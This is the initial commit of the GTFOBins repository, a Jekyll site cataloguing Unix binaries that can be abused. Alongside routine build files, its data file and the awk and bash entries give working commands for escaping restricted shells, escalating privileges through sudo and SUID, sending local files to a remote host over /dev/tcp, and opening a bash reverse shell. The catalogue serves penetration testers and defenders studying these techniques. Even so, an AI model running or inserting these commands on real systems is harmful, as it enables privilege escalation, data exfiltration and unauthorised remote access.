First commit

Author: epinna

.gitignore

@@ -0,0 +1,3 @@
+/_tmp/
+/.sass-cache/
+/_site/

CONTRIBUTING.md

@@ -0,0 +1,3 @@
+# Contributing
+
+TODO link to website URL

Gemfile

@@ -0,0 +1,3 @@
+source 'https://rubygems.org'
+
+gem 'jekyll'

Gemfile.lock

@@ -0,0 +1,63 @@
+GEM
+  remote: https://rubygems.org/
+  specs:
+    addressable (2.5.2)
+      public_suffix (>= 2.0.2, < 4.0)
+    colorator (1.1.0)
+    concurrent-ruby (1.0.5)
+    em-websocket (0.5.1)
+      eventmachine (>= 0.12.9)
+      http_parser.rb (~> 0.6.0)
+    eventmachine (1.2.7)
+    ffi (1.9.23)
+    forwardable-extended (2.6.0)
+    http_parser.rb (0.6.0)
+    i18n (0.9.5)
+      concurrent-ruby (~> 1.0)
+    jekyll (3.8.1)
+      addressable (~> 2.4)
+      colorator (~> 1.0)
+      em-websocket (~> 0.5)
+      i18n (~> 0.7)
+      jekyll-sass-converter (~> 1.0)
+      jekyll-watch (~> 2.0)
+      kramdown (~> 1.14)
+      liquid (~> 4.0)
+      mercenary (~> 0.3.3)
+      pathutil (~> 0.9)
+      rouge (>= 1.7, < 4)
+      safe_yaml (~> 1.0)
+    jekyll-sass-converter (1.5.2)
+      sass (~> 3.4)
+    jekyll-watch (2.0.0)
+      listen (~> 3.0)
+    kramdown (1.16.2)
+    liquid (4.0.0)
+    listen (3.1.5)
+      rb-fsevent (~> 0.9, >= 0.9.4)
+      rb-inotify (~> 0.9, >= 0.9.7)
+      ruby_dep (~> 1.2)
+    mercenary (0.3.6)
+    pathutil (0.16.1)
+      forwardable-extended (~> 2.6)
+    public_suffix (3.0.2)
+    rb-fsevent (0.10.3)
+    rb-inotify (0.9.10)
+      ffi (>= 0.5.0, < 2)
+    rouge (3.1.1)
+    ruby_dep (1.5.0)
+    safe_yaml (1.0.4)
+    sass (3.5.6)
+      sass-listen (~> 4.0.0)
+    sass-listen (4.0.0)
+      rb-fsevent (~> 0.9, >= 0.9.4)
+      rb-inotify (~> 0.9, >= 0.9.7)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  jekyll
+
+BUNDLED WITH
+   1.16.1

Makefile

@@ -0,0 +1,10 @@
+.PHONY: serve bundle
+
+serve:
+	bundle exec jekyll serve
+
+serve-public:
+	bundle exec jekyll serve --host 0.0.0.0
+
+bundle:
+	bundle install

README.md

@@ -0,0 +1,3 @@
+# GTFOBins
+
+TODO link to website URL

_config.yml

@@ -0,0 +1,15 @@
+title: GTFOBins
+
+exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
+
+permalink: pretty
+
+collections:
+  gtfobins:
+    output: true
+
+defaults:
+  - scope:
+      path: '_gtfobins'
+    values:
+      layout: bin

_data/functions.yml

@@ -0,0 +1,39 @@
+exec-interactive:
+  label: Interactive
+  description: It executes interactive commands that may be exploited to break out from restricted shells.
+
+exec-non-interactive:
+  label: Non-interactive
+  description: It executes non-interactive commands that may be exploited to break out from restricted shells.
+
+suid-enabled:
+  label: SUID
+  description: It runs with the SUID bit set and may be exploited to escalate or  maintain the privileges working as a SUID backdoor.
+
+suid-limited:
+  label: Limited SUID
+  description: It runs with the SUID bit set and may be exploited to escalate or  maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux.
+
+sudo-enabled:
+  label: Sudo
+  description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`.
+
+download:
+  label: Download
+  description: It can download remote files.
+
+upload:
+  label: Upload
+  description: It can exfiltrate files on the network.
+
+bind-shell:
+  label: Bind shell
+  description: It can bind a shell to a local port to allow remote network access.
+
+reverse-shell:
+  label: Reverse shell
+  description: It can send back a reverse shell to a listening attacker to open a remote network access.
+
+load-library:
+  label: Library load
+  description: It loads shared libraries that may be used to run code in the binary execution context.

_gtfobins/awk.md

@@ -0,0 +1,9 @@
+---
+functions:
+  exec-interactive:
+    - code: awk 'BEGIN {system("/bin/sh")}'
+  sudo-enabled:
+    - code: sudo awk 'BEGIN {system("/bin/sh -p")}'
+  suid-limited:
+    - code: ./awk 'BEGIN {system("/bin/sh -p")}'
+---

_gtfobins/bash.md

@@ -0,0 +1,40 @@
+---
+functions:
+  exec-interactive:
+    - code: bash
+  sudo-enabled:
+    - code: sudo bash
+  suid-enabled:
+    - code: ./bash -p
+  upload:
+    - description: Send local file in the body of an HTTP POST request.
+      code: |
+        RHOST=10.0.0.1
+        RPORT=8000
+        LFILE=file_to_send
+        echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
+    - description: Send local file using a TCP connection.
+      code: |
+        RHOST=10.0.0.1
+        RPORT=8000
+        LFILE=file_to_send
+        cat $LFILE > /dev/tcp/$RHOST/$RPORT
+  download:
+    - description: Fetch a remote file via HTTP GET request.
+      code: |
+        RHOST=10.0.0.1
+        RPORT=8000
+        LFILE=file_to_get
+        (echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
+    - description: Fetch remote file using a TCP connection.
+      code: |-
+        RHOST=10.0.0.1
+        RPORT=8000
+        LFILE=file_to_get
+        bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
+  reverse-shell:
+    - code: |
+        RHOST=127.0.0.1 
+        RPORT=8000
+        exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
+---